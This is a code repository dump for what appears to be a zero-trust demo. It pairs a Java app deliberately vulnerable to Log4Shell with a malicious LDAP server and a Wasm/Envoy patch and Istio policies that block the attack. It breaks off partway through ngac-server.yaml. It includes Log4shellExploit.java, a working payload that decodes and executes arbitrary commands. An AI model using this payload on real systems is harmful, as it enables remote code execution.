├── log4shell-ldap ├── exploit │ ├── .gitignore │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── io │ │ └── tetrate │ │ └── log4shell │ │ └── exploit │ │ └── Log4shellExploit.java ├── go.mod ├── Makefile ├── Dockerfile ├── go.sum └── main.go ├── k8s ├── .gitignore ├── local │ ├── uninstall.sh │ └── setup.sh ├── manifests │ ├── namespace.yaml │ ├── kustomization.yaml │ ├── istio-operator.yaml │ ├── vulnerable-app-ingress.yaml │ ├── vulnerable-app.yaml │ ├── log4shell-ldap.yaml │ └── istio-authservice.yaml ├── gke │ ├── certificate.yaml │ ├── issuer.yaml │ ├── uninstall.sh │ ├── setup.sh │ └── external-dns.yaml ├── Makefile ├── variables.example.env └── README.md ├── .gitignore ├── vulnerable-app ├── .gitignore ├── Makefile ├── Dockerfile ├── src │ └── main │ │ └── java │ │ └── io │ │ └── tetrate │ │ └── log4shell │ │ └── vulnerable │ │ ├── App.java │ │ └── GreetingsServlet.java └── pom.xml ├── wasm-patch ├── .gitignore ├── Dockerfile ├── go.mod ├── Makefile ├── go.sum ├── main_test.go ├── local-envoy.yaml └── main.go ├── ngac ├── namespace.yaml ├── authz-config.yaml ├── kustomization.yaml ├── Makefile ├── istio-operator.yaml ├── graph.txt ├── ngac-server.yaml ├── ngac-authz.yaml └── README.md ├── config ├── wasm-patch.yaml ├── ngac-policy.yaml ├── oidc-policy.yaml └── runtime-authn.yaml ├── Makefile ├── common.mk ├── docker-compose.yml ├── README.md └── DEMO.md /log4shell-ldap/exploit/.gitignore: -------------------------------------------------------------------------------- 1 | target/ -------------------------------------------------------------------------------- /k8s/.gitignore: -------------------------------------------------------------------------------- 1 | variables.env 2 | .swp 3 | 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .history 2 | .vscode 3 | .vimrc 4 | .idea 5 | .swp 6 | -------------------------------------------------------------------------------- /vulnerable-app/.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | .vscode/ 3 | .swp 4 | 5 | -------------------------------------------------------------------------------- /wasm-patch/.gitignore: -------------------------------------------------------------------------------- 1 | *.wasm 2 | .vscode 3 | .vimrc 4 | .idea 5 | *.swp 6 | -------------------------------------------------------------------------------- /k8s/local/uninstall.sh: -------------------------------------------------------------------------------- 1 | kubectl delete secret ingress-tls-cert -n istio-system --ignore-not-found -------------------------------------------------------------------------------- /ngac/namespace.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Namespace 3 | metadata: 4 | name: ngac 5 | labels: 6 | istio-injection: enabled 7 | -------------------------------------------------------------------------------- /k8s/manifests/namespace.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Namespace 3 | metadata: 4 | name: zta-demo 5 | labels: 6 | istio-injection: enabled 7 | -------------------------------------------------------------------------------- /k8s/manifests/kustomization.yaml: -------------------------------------------------------------------------------- 1 | resources: 2 | - namespace.yaml 3 | - log4shell-ldap.yaml 4 | - vulnerable-app.yaml 5 | - istio-authservice.yaml 6 | 7 | namespace: zta-demo 8 | -------------------------------------------------------------------------------- /log4shell-ldap/go.mod: -------------------------------------------------------------------------------- 1 | module log4shell-ldap 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/vjeantet/ldapserver v1.0.1 7 | github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 8 | ) 9 | -------------------------------------------------------------------------------- /log4shell-ldap/Makefile: -------------------------------------------------------------------------------- 1 | -include ../common.mk 2 | 3 | NAME := log4shell-ldap 4 | 5 | docker-build: 6 | docker build --platform linux/amd64 -t $(HUB)/$(NAME):$(TAG) . 7 | 8 | docker-push: 9 | docker push $(HUB)/$(NAME):$(TAG) 10 | -------------------------------------------------------------------------------- /vulnerable-app/Makefile: -------------------------------------------------------------------------------- 1 | -include ../common.mk 2 | 3 | NAME := vulnerable 4 | 5 | docker-build: 6 | docker build --platform linux/amd64 -t $(HUB)/$(NAME):$(TAG) . 7 | 8 | docker-push: 9 | docker push $(HUB)/$(NAME):$(TAG) 10 | -------------------------------------------------------------------------------- /wasm-patch/Dockerfile: -------------------------------------------------------------------------------- 1 | # Dockerfile for building "compat" variant of Wasm Image Specification. 2 | # https://github.com/solo-io/wasm/blob/master/spec/spec-compat.md 3 | FROM scratch 4 | 5 | ARG WASM_BINARY_PATH 6 | COPY ${WASM_BINARY_PATH} ./plugin.wasm -------------------------------------------------------------------------------- /ngac/authz-config.yaml: -------------------------------------------------------------------------------- 1 | resolvers: 2 | principal: 3 | - name: jwt_bearer 4 | params: 5 | header: authorization 6 | prefix: "Bearer " 7 | subject-claim: "https://zta-demo/group" 8 | operation: 9 | - name: method 10 | resource: 11 | - name: request_path 12 | -------------------------------------------------------------------------------- /config/wasm-patch.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: extensions.istio.io/v1alpha1 2 | kind: WasmPlugin 3 | metadata: 4 | name: log4shell-patch 5 | namespace: zta-demo 6 | spec: 7 | selector: 8 | matchLabels: 9 | language: java 10 | url: oci://${WASM_HUB}/log4shell-patch:${TAG} 11 | imagePullPolicy: Always 12 | -------------------------------------------------------------------------------- /k8s/gke/certificate.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: cert-manager.io/v1 2 | kind: Certificate 3 | metadata: 4 | name: ingress-cert 5 | namespace: istio-system 6 | spec: 7 | secretName: ingress-tls-cert 8 | issuerRef: 9 | name: letsencrypt-issuer 10 | kind: ClusterIssuer 11 | dnsNames: 12 | - ${DOMAIN} 13 | -------------------------------------------------------------------------------- /k8s/manifests/istio-operator.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: install.istio.io/v1alpha1 2 | kind: IstioOperator 3 | spec: 4 | profile: demo 5 | meshConfig: 6 | extensionProviders: 7 | - name: "authservice-grpc" 8 | envoyExtAuthzGrpc: 9 | service: "authservice.zta-demo.svc.cluster.local" 10 | port: "10003" 11 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | include common.mk 2 | 3 | APPS := log4shell-ldap vulnerable-app wasm-patch 4 | 5 | docker-build: $(APPS:%=docker-build/%) 6 | docker-push: $(APPS:%=docker-push/%) 7 | 8 | docker-build/%: 9 | $(MAKE) -C $(@F) $(@D) 10 | 11 | docker-push/%: 12 | $(MAKE) -C $(@F) $(@D) 13 | 14 | clean: 15 | $(MAKE) -C wasm-patch clean 16 | -------------------------------------------------------------------------------- /config/ngac-policy.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: security.istio.io/v1beta1 2 | kind: AuthorizationPolicy 3 | metadata: 4 | name: ngac-authz 5 | namespace: zta-demo 6 | spec: 7 | selector: 8 | matchLabels: 9 | app: vulnerable 10 | action: CUSTOM 11 | provider: 12 | name: ngac-grpc 13 | rules: 14 | - to: 15 | - operation: 16 | paths: ["/*"] 17 | -------------------------------------------------------------------------------- /ngac/kustomization.yaml: -------------------------------------------------------------------------------- 1 | resources: 2 | - namespace.yaml 3 | - ngac-server.yaml 4 | - ngac-authz.yaml 5 | 6 | namespace: ngac 7 | 8 | configMapGenerator: 9 | - name: ngac-graph 10 | files: 11 | - graph.txt 12 | - name: ngac-authz-config 13 | files: 14 | - resolver.yaml=authz-config.yaml 15 | 16 | generatorOptions: 17 | disableNameSuffixHash: true 18 | -------------------------------------------------------------------------------- /config/oidc-policy.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: security.istio.io/v1beta1 2 | kind: AuthorizationPolicy 3 | metadata: 4 | name: ext-authz 5 | namespace: istio-system 6 | spec: 7 | selector: 8 | matchLabels: 9 | app: istio-ingressgateway 10 | action: CUSTOM 11 | provider: 12 | name: authservice-grpc 13 | rules: 14 | - to: 15 | - operation: 16 | paths: ["/*"] 17 | -------------------------------------------------------------------------------- /config/runtime-authn.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: security.istio.io/v1beta1 2 | kind: AuthorizationPolicy 3 | metadata: 4 | name: allow-from-ingress 5 | namespace: zta-demo 6 | spec: 7 | selector: 8 | matchLabels: 9 | app: vulnerable 10 | action: ALLOW 11 | rules: 12 | - from: 13 | - source: 14 | principals: ["cluster.local/ns/istio-system/sa/istio-ingressgateway-service-account"] 15 | -------------------------------------------------------------------------------- /common.mk: -------------------------------------------------------------------------------- 1 | # Common variables 2 | 3 | # Change to push application images to a different registry 4 | export HUB ?= gcr.io/ignasi-nist-2022 5 | 6 | # Istio 1.12 does not yet support imagePullSecrets in 7 | # WasmPlugins to pull images from private registries. 8 | # We need to push the WASM patch to a public Docker registry. 9 | export WASM_HUB ?= docker.io/nacx 10 | 11 | # Tag used for all the iamges 12 | export TAG ?= 0.1 13 | -------------------------------------------------------------------------------- /ngac/Makefile: -------------------------------------------------------------------------------- 1 | 2 | install: 3 | istioctl install -y -f istio-operator.yaml 4 | kustomize build . | kubectl apply -f - 5 | 6 | uninstall: unconfigure 7 | @# Restore the original Istio config, without NGAC 8 | istioctl install -y -f ../k8s/manifests/istio-operator.yaml 9 | kustomize build . | kubectl delete --ignore-not-found -f - 10 | 11 | unconfigure: 12 | kubectl delete --ignore-not-found -f ../config/ngac-policy.yaml 13 | -------------------------------------------------------------------------------- /wasm-patch/go.mod: -------------------------------------------------------------------------------- 1 | module io.tetrate.log4shell.patch 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/buger/jsonparser v1.1.1 7 | github.com/stretchr/testify v1.7.0 8 | github.com/tetratelabs/proxy-wasm-go-sdk v0.16.0 9 | ) 10 | 11 | require ( 12 | github.com/davecgh/go-spew v1.1.1 // indirect 13 | github.com/pmezard/go-difflib v1.0.0 // indirect 14 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b // indirect 15 | ) 16 | -------------------------------------------------------------------------------- /ngac/istio-operator.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: install.istio.io/v1alpha1 2 | kind: IstioOperator 3 | spec: 4 | profile: demo 5 | meshConfig: 6 | extensionProviders: 7 | - name: "authservice-grpc" 8 | envoyExtAuthzGrpc: 9 | service: "authservice.zta-demo.svc.cluster.local" 10 | port: "10003" 11 | - name: "ngac-grpc" 12 | envoyExtAuthzGrpc: 13 | service: "ngac-authz.ngac.svc.cluster.local" 14 | port: "8080" 15 | -------------------------------------------------------------------------------- /log4shell-ldap/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM maven:3-jdk-8 as javabuilder 2 | RUN mkdir /build/ 3 | COPY exploit/ /build 4 | RUN cd /build && mvn package 5 | 6 | FROM golang:1.16 as gobuilder 7 | WORKDIR / 8 | COPY go.* ./ 9 | COPY main.go . 10 | RUN go mod download 11 | COPY --from=javabuilder /build/target/log4shell-exploit-1.0-SNAPSHOT.jar . 12 | RUN CGO_ENABLED=0 GOOS=linux go build -a -tags app -o app -ldflags '-w' . 13 | 14 | FROM scratch 15 | COPY --from=gobuilder /app /app 16 | ENTRYPOINT ["/app"] 17 | EXPOSE 3000 18 | EXPOSE 1389 19 | -------------------------------------------------------------------------------- /wasm-patch/Makefile: -------------------------------------------------------------------------------- 1 | -include ../common.mk 2 | 3 | NAME := log4shell-patch 4 | WASM := $(NAME).wasm 5 | 6 | OUT := $(WASM) 7 | 8 | compile: $(OUT) 9 | 10 | $(OUT): 11 | tinygo build -o $(OUT) -scheduler=none -target=wasi ./... 12 | 13 | test: 14 | go test -v -tags=proxytest ./... 15 | 16 | clean: 17 | rm -f $(OUT) 18 | 19 | docker-build: $(OUT) 20 | docker build --platform linux/amd64 --build-arg WASM_BINARY_PATH=$(OUT) -t $(WASM_HUB)/$(NAME):$(TAG) . 21 | 22 | docker-push: 23 | docker push $(WASM_HUB)/$(NAME):$(TAG) 24 | -------------------------------------------------------------------------------- /k8s/gke/issuer.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: cert-manager.io/v1 2 | kind: ClusterIssuer 3 | metadata: 4 | name: letsencrypt-issuer 5 | namespace: cert-manager 6 | spec: 7 | acme: 8 | email: ${EMAIL} 9 | server: https://acme-v02.api.letsencrypt.org/directory 10 | preferredChain: "ISRG Root X1" 11 | privateKeySecretRef: 12 | name: letsencrypt-issuer-key 13 | solvers: 14 | - dns01: 15 | cloudDNS: 16 | project: ${PROJECT_ID} 17 | serviceAccountSecretRef: 18 | name: clouddns-dns01-solver-sa 19 | key: key.json 20 | -------------------------------------------------------------------------------- /log4shell-ldap/go.sum: -------------------------------------------------------------------------------- 1 | github.com/logrusorgru/aurora v2.0.3+incompatible h1:tOpm7WcpBTn4fjmVfgpQq0EfczGlG91VSDkswnjF5A8= 2 | github.com/logrusorgru/aurora v2.0.3+incompatible/go.mod h1:7rIyQOR62GCctdiQpZ/zOJlFyk6y+94wXzv6RNZgaR4= 3 | github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 h1:wIONC+HMNRqmWBjuMxhatuSzHaljStc4gjDeKycxy0A= 4 | github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3/go.mod h1:37YR9jabpiIxsb8X9VCIx8qFOjTDIIrIHHODa8C4gz0= 5 | github.com/vjeantet/ldapserver v1.0.1 h1:3z+TCXhwwDLJC3pZCNbuECPDqC2x1R7qQQbswB1Qwoc= 6 | github.com/vjeantet/ldapserver v1.0.1/go.mod h1:YvUqhu5vYhmbcLReMLrm/Tq3S7Yj43kSVFvvol6Lh6k= 7 | -------------------------------------------------------------------------------- /vulnerable-app/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM maven:3-jdk-8 as builder 2 | RUN mkdir /build/ 3 | WORKDIR /build 4 | COPY ./ ./ 5 | # predownlaod dependencies to favour docker caching 6 | RUN mvn verify 7 | RUN mvn clean compile assembly:single 8 | 9 | FROM openjdk:8u102-jdk 10 | COPY --from=builder /build/target/vulnerable-1.0-SNAPSHOT-jar-with-dependencies.jar . 11 | EXPOSE 8080 12 | #ENV LOG4J_FORMAT_MSG_NO_LOOKUPS=false 13 | #CMD java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -Dcom.sun.jndi.rmi.object.trustURLCodebase=true -jar vulnerable-1.0-SNAPSHOT-jar-with-dependencies.jar 14 | CMD java -jar vulnerable-1.0-SNAPSHOT-jar-with-dependencies.jar 15 | -------------------------------------------------------------------------------- /log4shell-ldap/exploit/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 4.0.0 5 | io.tetrate 6 | log4shell-exploit 7 | 1.0-SNAPSHOT 8 | 9 | 10 | 8 11 | 8 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /k8s/gke/uninstall.sh: -------------------------------------------------------------------------------- 1 | kubectl delete secret ingress-tls-cert -n istio-system --ignore-not-found 2 | kubectl delete secret clouddns-dns01-solver-sa -n cert-manager --ignore-not-found 3 | 4 | envsubst < external-dns.yaml | kubectl delete --ignore-not-found -f - 5 | envsubst < issuer.yaml | kubectl delete --ignore-not-found -f - 6 | envsubst < certificate.yaml | kubectl delete --ignore-not-found -f - 7 | 8 | kubectl delete -f https://github.com/jetstack/cert-manager/releases/download/v1.6.1/cert-manager.yaml 9 | 10 | kubectl delete namespace cert-manager --ignore-not-found 11 | 12 | gcloud iam service-accounts delete dns01-solver@${PROJECT_ID}.iam.gserviceaccount.com --quiet 13 | -------------------------------------------------------------------------------- /k8s/Makefile: -------------------------------------------------------------------------------- 1 | 2 | install/%: 3 | istioctl install -y -f manifests/istio-operator.yaml 4 | cd $(@F) && bash setup.sh 5 | kustomize build manifests/ | envsubst | kubectl apply -f - 6 | envsubst < manifests/vulnerable-app-ingress.yaml | kubectl apply -f - 7 | 8 | uninstall/%: unconfigure 9 | kustomize build manifests/ | envsubst | kubectl delete --ignore-not-found -f - 10 | cd $(@F) && bash uninstall.sh 11 | istioctl x uninstall --purge -y 12 | kubectl delete namespace istio-system --ignore-not-found 13 | 14 | unconfigure: 15 | kubectl delete --ignore-not-found -f ../config/oidc-policy.yaml 16 | kubectl delete --ignore-not-found -f ../config/runtime-authn.yaml 17 | envsubst < ../config/wasm-patch.yaml | kubectl delete --ignore-not-found -f - 18 | -------------------------------------------------------------------------------- /k8s/manifests/vulnerable-app-ingress.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: networking.istio.io/v1alpha3 2 | kind: Gateway 3 | metadata: 4 | name: vulnerable 5 | namespace: zta-demo 6 | spec: 7 | selector: 8 | istio: ingressgateway 9 | servers: 10 | - port: 11 | number: 443 12 | name: https 13 | protocol: HTTPS 14 | tls: 15 | mode: SIMPLE 16 | credentialName: ingress-tls-cert 17 | hosts: 18 | - "${INGRESS_HOST}" 19 | --- 20 | apiVersion: networking.istio.io/v1alpha3 21 | kind: VirtualService 22 | metadata: 23 | name: vulnerable 24 | namespace: zta-demo 25 | spec: 26 | hosts: 27 | - "${INGRESS_HOST}" 28 | gateways: 29 | - vulnerable 30 | http: 31 | - route: 32 | - destination: 33 | host: vulnerable 34 | port: 35 | number: 8080 36 | -------------------------------------------------------------------------------- /vulnerable-app/src/main/java/io/tetrate/log4shell/vulnerable/App.java: -------------------------------------------------------------------------------- 1 | package io.tetrate.log4shell.vulnerable; 2 | 3 | import org.apache.logging.log4j.Level; 4 | import org.apache.logging.log4j.core.config.Configurator; 5 | import org.eclipse.jetty.server.Server; 6 | import org.eclipse.jetty.servlet.ServletContextHandler; 7 | 8 | public final class App { 9 | 10 | public static void main(String[] args) throws Exception { 11 | Configurator.setRootLevel(Level.INFO); 12 | Configurator.setLevel(GreetingsServlet.class.getName(), Level.DEBUG); 13 | 14 | Server server = new Server(8080); 15 | ServletContextHandler handler = new ServletContextHandler(server, "/"); 16 | handler.addServlet(GreetingsServlet.class, "/"); 17 | server.start(); 18 | } 19 | 20 | } 21 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | 3 | services: 4 | 5 | # vulnerable application exploitable with log4shell 6 | vulnerable: 7 | build: vulnerable-app 8 | ports: 9 | - 8080:8080 10 | 11 | # malicious LDAP server providing log4shell exploits 12 | log4shell: 13 | build: log4shell-ldap 14 | environment: 15 | - publicIp=log4shell 16 | ports: 17 | - 3000:3000 18 | - 1389:1389 19 | 20 | # Envoy proxy with the wasm-patch loaded to prevent log4shell attacks 21 | envoy: 22 | image: envoyproxy/envoy:v1.21.0 23 | command: -c /opt/log4shell/envoy.yaml 24 | ports: 25 | - 8000:8000 26 | volumes: 27 | - "./wasm-patch/local-envoy.yaml:/opt/log4shell/envoy.yaml" 28 | - "./wasm-patch/log4shell-patch.wasm:/opt/log4shell/log4shell-patch.wasm" 29 | -------------------------------------------------------------------------------- /k8s/local/setup.sh: -------------------------------------------------------------------------------- 1 | source ../variables.env 2 | 3 | set -e 4 | 5 | DAYS=1825 # 5 years 6 | CN=localhost 7 | OUTDIR=$(mktemp -d) 8 | 9 | pushd . 10 | mkdir -p ${OUTDIR} 11 | cd ${OUTDIR} 12 | 13 | echo "Generating the CA..." 14 | openssl genrsa -out ca.key 2048 15 | openssl req -x509 -new -nodes -key ca.key -sha256 -out ca.crt -days ${DAYS} -subj "/C=US/ST=California/L=San Francisco/O=Tetrate" 16 | 17 | echo "Generating the server certificate..." 18 | openssl genrsa -out cert.key 2048 19 | openssl req -new -key cert.key -out cert.csr -subj "/C=US/ST=California/L=San Francisco/O=Tetrate/CN=${CN}" 20 | openssl x509 -req -extfile <(printf "subjectAltName=DNS:${CN}") -in cert.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out cert.crt -days ${DAYS} -sha256 21 | 22 | kubectl delete secret -n istio-system ingress-tls-cert --ignore-not-found 23 | kubectl create secret tls -n istio-system ingress-tls-cert --key=cert.key --cert=cert.crt 24 | 25 | popd 26 | -------------------------------------------------------------------------------- /ngac/graph.txt: -------------------------------------------------------------------------------- 1 | # Create a couple user nodes representing the gropus 2 | node U Engineering 3 | node U Admins 4 | node UA privileged 5 | node UA unprivileged 6 | node UA everyone 7 | assign Engineering unprivileged 8 | assign Admins privileged 9 | assign privileged everyone 10 | assign unprivileged everyone 11 | 12 | # Model HTTP paths we want to enforce access to 13 | node O / 14 | node O /private 15 | node OA protected 16 | node OA unprotected 17 | node OA kind 18 | assign / unprotected 19 | assign /private protected 20 | assign protected kind 21 | assign unprotected kind 22 | 23 | # Create an "http" policy to enforce access from groups to the configured paths 24 | node PC http 25 | assign everyone http 26 | assign kind http 27 | 28 | # Configure permissions to each path: 29 | # - Users from all groups can do requests to public paths 30 | # - Only members of the "Admins" team can do post requests to the private paths 31 | assoc everyone unprotected GET 32 | assoc privileged protected GET 33 | -------------------------------------------------------------------------------- /k8s/manifests/vulnerable-app.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: vulnerable 5 | labels: 6 | app: vulnerable 7 | language: java 8 | spec: 9 | ports: 10 | - port: 8080 11 | targetPort: 8080 12 | name: http 13 | selector: 14 | app: vulnerable 15 | --- 16 | apiVersion: v1 17 | kind: ServiceAccount 18 | metadata: 19 | name: vulnerable 20 | labels: 21 | app: vulnerable 22 | --- 23 | apiVersion: apps/v1 24 | kind: Deployment 25 | metadata: 26 | name: vulnerable 27 | labels: 28 | app: vulnerable 29 | language: java 30 | spec: 31 | selector: 32 | matchLabels: 33 | app: vulnerable 34 | template: 35 | metadata: 36 | annotations: 37 | sidecar.istio.io/logLevel: "jwt:debug,ext_authz:debug,rbac:debug,wasm:debug" 38 | labels: 39 | app: vulnerable 40 | language: java 41 | spec: 42 | serviceAccountName: vulnerable 43 | containers: 44 | - name: vulnerable 45 | image: ${HUB}/vulnerable:${TAG} 46 | imagePullPolicy: Always 47 | ports: 48 | - name: http 49 | containerPort: 8080 50 | -------------------------------------------------------------------------------- /k8s/manifests/log4shell-ldap.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: log4shell 5 | labels: 6 | app: log4shell 7 | spec: 8 | ports: 9 | - port: 3000 10 | targetPort: 3000 11 | name: http 12 | - port: 1389 13 | targetPort: 1389 14 | name: tcp-ldap 15 | selector: 16 | app: log4shell 17 | --- 18 | apiVersion: v1 19 | kind: ServiceAccount 20 | metadata: 21 | name: log4shell 22 | labels: 23 | app: log4shell 24 | --- 25 | apiVersion: apps/v1 26 | kind: Deployment 27 | metadata: 28 | name: log4shell 29 | labels: 30 | app: log4shell 31 | spec: 32 | selector: 33 | matchLabels: 34 | app: log4shell 35 | template: 36 | metadata: 37 | labels: 38 | app: log4shell 39 | spec: 40 | serviceAccountName: log4shell 41 | containers: 42 | - name: log4shell-ldap 43 | image: ${HUB}/log4shell-ldap:${TAG} 44 | imagePullPolicy: Always 45 | env: 46 | - name: publicIp 47 | value: log4shell 48 | ports: 49 | - name: http 50 | containerPort: 3000 51 | - name: tcp-ldap 52 | containerPort: 1389 53 | -------------------------------------------------------------------------------- /k8s/gke/setup.sh: -------------------------------------------------------------------------------- 1 | source ../variables.env 2 | 3 | # Install cert-manager 4 | kubectl apply -f https://github.com/jetstack/cert-manager/releases/download/v1.6.1/cert-manager.yaml 5 | 6 | # Make sure the Cloud DNS API is enabled 7 | gcloud services enable dns.googleapis.com containerregistry.googleapis.com --project=${PROJECT_ID} 8 | 9 | # Configure the service account and secret cert-manager will use 10 | # to solve the ACME challenges presented by Let's Encrypt when issuing 11 | # certificates. 12 | # This account will be used by external-dns as well to automatically create 13 | # DNS records for the hostnames exposed in the mesh. 14 | gcloud iam service-accounts create dns01-solver \ 15 | --project ${PROJECT_ID} \ 16 | --display-name "dns01-solver" 17 | 18 | gcloud projects add-iam-policy-binding ${PROJECT_ID} \ 19 | --member serviceAccount:dns01-solver@${PROJECT_ID}.iam.gserviceaccount.com \ 20 | --role roles/dns.admin 21 | 22 | gcloud iam service-accounts keys create /tmp/key.json \ 23 | --iam-account dns01-solver@${PROJECT_ID}.iam.gserviceaccount.com 24 | 25 | kubectl delete secret clouddns-dns01-solver-sa --ignore-not-found 26 | kubectl create secret generic clouddns-dns01-solver-sa \ 27 | -n cert-manager \ 28 | --from-file=/tmp/key.json 29 | 30 | envsubst < external-dns.yaml | kubectl apply -n cert-manager -f - 31 | 32 | echo "Waiting a bit for cert-manager..." 33 | sleep 60 34 | 35 | envsubst < issuer.yaml | kubectl apply -f - 36 | envsubst < certificate.yaml | kubectl apply -f - 37 | -------------------------------------------------------------------------------- /log4shell-ldap/exploit/src/main/java/io/tetrate/log4shell/exploit/Log4shellExploit.java: -------------------------------------------------------------------------------- 1 | package io.tetrate.log4shell.exploit; 2 | 3 | import javax.naming.Context; 4 | import javax.naming.Name; 5 | import javax.naming.spi.ObjectFactory; 6 | 7 | import java.io.IOException; 8 | import java.io.InputStream; 9 | import java.util.Base64; 10 | import java.util.Hashtable; 11 | import java.util.Scanner; 12 | 13 | public class Log4shellExploit implements ObjectFactory { 14 | 15 | @Override 16 | public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) { 17 | InputStream in = null; 18 | Scanner sc = null; 19 | 20 | System.out.println("/!\\ /!\\ /!\\ You have been pwned!"); 21 | System.out.println("/!\\ /!\\ /!\\ RCE exploit loaded"); 22 | 23 | try { 24 | String encoded = name.toString().replaceAll("exec/", "").replaceAll("\"", ""); 25 | String cmd = new String(Base64.getDecoder().decode(encoded)); 26 | System.out.println("/!\\ /!\\ /!\\ Executing: " + cmd); 27 | 28 | in = Runtime.getRuntime().exec(cmd).getInputStream(); 29 | sc = new Scanner(in).useDelimiter("\\A"); 30 | if (sc.hasNext()) System.out.println(sc.next()); 31 | } catch (Exception ex) { 32 | ex.printStackTrace(); 33 | } finally { 34 | try { 35 | if (in != null) in.close(); 36 | if (sc != null) sc.close(); 37 | } catch (IOException e) { 38 | } 39 | } 40 | 41 | return "pwned!"; 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /wasm-patch/go.sum: -------------------------------------------------------------------------------- 1 | github.com/buger/jsonparser v1.1.1 h1:2PnMjfWD7wBILjqQbt530v576A/cAbQvEW9gGIpYMUs= 2 | github.com/buger/jsonparser v1.1.1/go.mod h1:6RYKKt7H4d4+iWqouImQ9R2FZql3VbhNgx27UK13J/0= 3 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 4 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 5 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 6 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 7 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 8 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 9 | github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY= 10 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 11 | github.com/tetratelabs/proxy-wasm-go-sdk v0.16.0 h1:6xhDLV4DD2+q3Rs4CDh7cqo69rQ50XgCusv/58D44o4= 12 | github.com/tetratelabs/proxy-wasm-go-sdk v0.16.0/go.mod h1:8CxNZJ+9yDEvNnAog384fC8j1tKNF0tTZevGjOuY9ds= 13 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= 14 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 15 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 16 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= 17 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 18 | -------------------------------------------------------------------------------- /ngac/ngac-server.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: ngac-server 5 | labels: 6 | app: ngac-server 7 | spec: 8 | ports: 9 | - name: grpc-ngac 10 | port: 8080 11 | targetPort: 8080 12 | selector: 13 | app: ngac-server 14 | --- 15 | apiVersion: v1 16 | kind: ServiceAccount 17 | metadata: 18 | name: ngac-server 19 | labels: 20 | app: ngac-server 21 | --- 22 | apiVersion: apps/v1 23 | kind: Deployment 24 | metadata: 25 | name: ngac-server 26 | labels: 27 | app: ngac-server 28 | spec: 29 | replicas: 1 30 | selector: 31 | matchLabels: 32 | app: ngac-server 33 | template: 34 | metadata: 35 | labels: 36 | app: ngac-server 37 | spec: 38 | serviceAccountName: ngac-server 39 | containers: 40 | - name: ngac-server 41 | image: docker.io/nacx/ngac-server:nist-2022 42 | imagePullPolicy: Always 43 | ports: 44 | - containerPort: 8080 45 | livenessProbe: 46 | initialDelaySeconds: 10 47 | periodSeconds: 10 48 | tcpSocket: 49 | port: 8080 50 | readinessProbe: 51 | initialDelaySeconds: 10 52 | periodSeconds: 10 53 | httpGet: 54 | path: /health 55 | port: 8080 56 | volumeMounts: 57 | - mountPath: /etc/ngac/ 58 | name: graph 59 | env: 60 | - name: NGAC_ADDRESS 61 | value: :8080 62 | - name: NGAC_BACKEND 63 | value: file 64 | - 